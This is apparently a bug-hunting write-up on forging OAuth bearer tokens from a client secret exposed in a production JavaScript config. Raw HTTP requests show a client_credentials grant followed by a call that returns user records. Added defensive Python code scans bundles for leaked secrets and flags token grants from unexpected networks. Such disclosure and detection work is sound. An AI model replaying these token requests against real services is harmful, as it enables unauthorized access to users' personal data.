Forging OAuth tokens using discovered client id and client secret

{
  "ENV": "prod",
  "SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
  "SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
  "MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
  "MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
  "SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};
Disclaimer: all values were replaced
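A config object like the one above only becomes a finding if someone looks for it. The following is an added example (not code from the original post) of the kind of check a defender can run over a fetched JS bundle or config file to flag credential-looking key/value pairs before they ship: it matches conventional secret key names, skips short policy strings and low-entropy placeholders, and reports a masked value so the finding can be matched to the real secret without re-leaking it. The sample input reuses the page's redacted placeholders plus two constructed keys (ADMIN_TOKEN, PASSWORD_POLICY) that exercise the filters; the thresholds are assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample input: a config object of the kind the page found in a
# production bundle. Values are the page's own redacted placeholders, plus two
# constructed keys (ADMIN_TOKEN, PASSWORD_POLICY) added to exercise the filters.
SAMPLE_CONFIG = """
var config = {
  "ENV": "prod",
  "SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
  "SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
  "MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
  "MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
  "SERVICE_OAUTH_CLIENT_API_VERSION": "v2",
  "ADMIN_TOKEN": "xxxxxxxxxxxxxxxxxxxx",
  "PASSWORD_POLICY": "min8chars"
};
"""

# Key names that conventionally hold credentials. A bare client_id is public by
# design, so it is deliberately not matched; the secret beside it is what matters.
SECRET_KEY_RE = re.compile(
    r"(secret|passw(or)?d|token|api[_-]?key|private[_-]?key)", re.IGNORECASE
)

# Quoted or bare key followed by a quoted string value (JSON or JS object literal).
PAIR_RE = re.compile(r"""["']?([A-Za-z_][A-Za-z0-9_.-]*)["']?\s*:\s*["']([^"']*)["']""")


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking secrets score well above prose or 'xxxx'."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def mask(value: str, keep: int = 4) -> str:
    """Keep a short prefix so the finding can be matched to the real value later."""
    return value[:keep] + "*" * (len(value) - keep)


def find_leaked_secrets(text: str, min_len: int = 16, min_entropy: float = 3.0):
    """Return (key, masked_value, entropy) for every credential-looking pair in text."""
    findings = []
    for key, value in PAIR_RE.findall(text):
        if not SECRET_KEY_RE.search(key):
            continue
        if len(value) < min_len:          # short policy strings such as "min8chars"
            continue
        h = shannon_entropy(value)
        if h < min_entropy:               # placeholders such as "xxxxxxxx" score ~0 bits
            continue
        findings.append((key, mask(value), round(h, 2)))
    return findings


if __name__ == "__main__":
    for key, masked, h in find_leaked_secrets(SAMPLE_CONFIG):
        print(f"{key}: {masked} (entropy {h} bits/char)")
```

Run against the sample, the two `*_CLIENT_SECRET` entries are the only hits; the two `*_CLIENT_ID` values, the version string and the constructed decoys all fall through one of the three filters. In a real pipeline the same function would run over every asset the build emits, and any hit blocks the deploy until the secret is moved server-side and rotated.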

OAuth is an open-standard authorization protocol or framework that gives applications “secure designated access.” For example, you can tell Facebook that it’s OK for Instagram to access your profile or post updates to your story without having to give Instagram your Facebook password. This minimizes risk in a major way: if Instagram suffers a breach, your Facebook password remains safe.

Let’s try to use these credentials:

POST /{identity url}/oauth/v1/token HTTP/1.1
Host: site.com
Authorization: Basic ehajnnsmnshjaknsjilkmnshtghjklikjWlOTno6VXdsQSgdhjnsmkjdhfbnnmkjshbnbhahsjkkluyhsghbshjnmkdjhead==
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

grant_type=client_credentials

HTTP/1.1 200 OK
Date: Thu, 05 May 2022 21:15:28 GMT
Content-Type: application/json
Content-Length: 1008
Connection: close
Cache-Control: no-cache, no-store, no-transform

{"token_type":"bearer","access_token":"eyJ0[…redacted…]"}
POST /api/v1/users HTTP/1.1
Host: site.com
Authorization: Bearer eyJ0[…redacted…]
Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK
[...]

[
  {
    "username": "Name",
    "id": "BLALALALA",
    "phone": "21254488"
  },
  {
    "username": "Name",
    "id": "BLALALALA",
    "phone": "21254488"
  }
]
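The token request above is a client_credentials grant: whoever holds the client id and secret gets a bearer token with whatever scope the service client was provisioned with, and the identity provider has no user to prompt. What gives the misuse away is where the grant comes from. A confidential service client is expected to request tokens from the back-end network it runs on, so a grant from anywhere else is the signal to look for. The following is an added example (not code from the original post) of that detection run over a constructed JSON-lines access log from a gateway in front of the token endpoint; the field names, the allow-listed networks and the alert format are assumptions, the client ids reuse the page's redacted placeholders, and 203.0.113.0/24 is documentation address space.

```python
import ipaddress
import json

# Constructed sample: JSON-lines access log from an assumed gateway in front of
# the identity service. Field names are assumptions for this example; the client
# ids are the page's redacted placeholders; 203.0.113.77 is a documentation address.
SAMPLE_LOG = """
{"ts": "2022-05-05T21:10:02Z", "path": "/oauth/v1/token", "grant_type": "client_credentials", "client_id": "mvaxns1234gahnbnjkdfsasdgyjkuigv", "src_ip": "10.20.1.15", "status": 200}
{"ts": "2022-05-05T21:12:44Z", "path": "/oauth/v1/token", "grant_type": "client_credentials", "client_id": "mvaxns1234gahnbnjkdfsasdgyjkuigv", "src_ip": "10.20.1.16", "status": 200}
{"ts": "2022-05-05T21:15:28Z", "path": "/oauth/v1/token", "grant_type": "client_credentials", "client_id": "mvaxns1234gahnbnjkdfsasdgyjkuigv", "src_ip": "203.0.113.77", "status": 200}
{"ts": "2022-05-05T21:15:40Z", "path": "/oauth/v1/token", "grant_type": "client_credentials", "client_id": "safsfads-ascd-vcxd-dsfds-adhdnmajkss", "src_ip": "203.0.113.77", "status": 401}
{"ts": "2022-05-05T21:16:03Z", "path": "/api/v1/users", "client_id": "mvaxns1234gahnbnjkdfsasdgyjkuigv", "src_ip": "203.0.113.77", "status": 200}
{"ts": "2022-05-05T21:17:11Z", "path": "/oauth/v1/token", "grant_type": "client_credentials", "client_id": "zzzz-unregistered-client", "src_ip": "10.20.1.15", "status": 401}
"""

# Assumed allow-list: the back-end networks each confidential client is
# expected to request tokens from. Anything else is not that service.
CLIENT_NETWORKS = {
    "mvaxns1234gahnbnjkdfsasdgyjkuigv": [ipaddress.ip_network("10.20.0.0/16")],
    "safsfads-ascd-vcxd-dsfds-adhdnmajkss": [ipaddress.ip_network("10.20.0.0/16")],
}


def parse_log(text: str):
    """One dict per non-empty JSON line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_token_misuse(events, client_networks):
    """Flag client_credentials grants that do not come from the client's own network.

    Rules:
      external-token-grant   successful grant from outside the allow-list (secret is in use elsewhere)
      external-auth-failure  failed grant from outside the allow-list (someone is trying a secret)
      unknown-client         client_id that is not registered in the allow-list at all
    """
    alerts = []
    for e in events:
        if e.get("path") != "/oauth/v1/token" or e.get("grant_type") != "client_credentials":
            continue  # only token issuance is in scope here
        cid = e.get("client_id")
        src = ipaddress.ip_address(e["src_ip"])
        allowed = client_networks.get(cid)
        if allowed is None:
            alerts.append({"rule": "unknown-client", "severity": "medium",
                           "client_id": cid, "src_ip": str(src), "ts": e["ts"]})
            continue
        if any(src in net for net in allowed):
            continue  # expected origin, nothing to report
        if e.get("status") == 200:
            rule, severity = "external-token-grant", "high"
        else:
            rule, severity = "external-auth-failure", "medium"
        alerts.append({"rule": rule, "severity": severity,
                       "client_id": cid, "src_ip": str(src), "ts": e["ts"]})
    return alerts


def clients_to_rotate(alerts):
    """A successful external grant means the secret is compromised: rotate it."""
    return {a["client_id"] for a in alerts if a["rule"] == "external-token-grant"}


if __name__ == "__main__":
    found = detect_token_misuse(parse_log(SAMPLE_LOG), CLIENT_NETWORKS)
    for a in found:
        print(f'{a["ts"]} {a["severity"]:6} {a["rule"]:22} {a["client_id"]} from {a["src_ip"]}')
    print("rotate:", sorted(clients_to_rotate(found)))
```

On the sample, the two grants from 10.20.0.0/16 are silent, the 21:15:28 grant from 203.0.113.77 (the same timestamp as the page's 200 OK) is the high-severity hit, the failed attempt with the Marketo client id is a medium, and the unregistered id is reported separately. The response to a high is the one the page implies: rotate the service secret and move it out of the client bundle, and shrink the service client's scope so a future leak cannot reach `/api/v1/users`.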
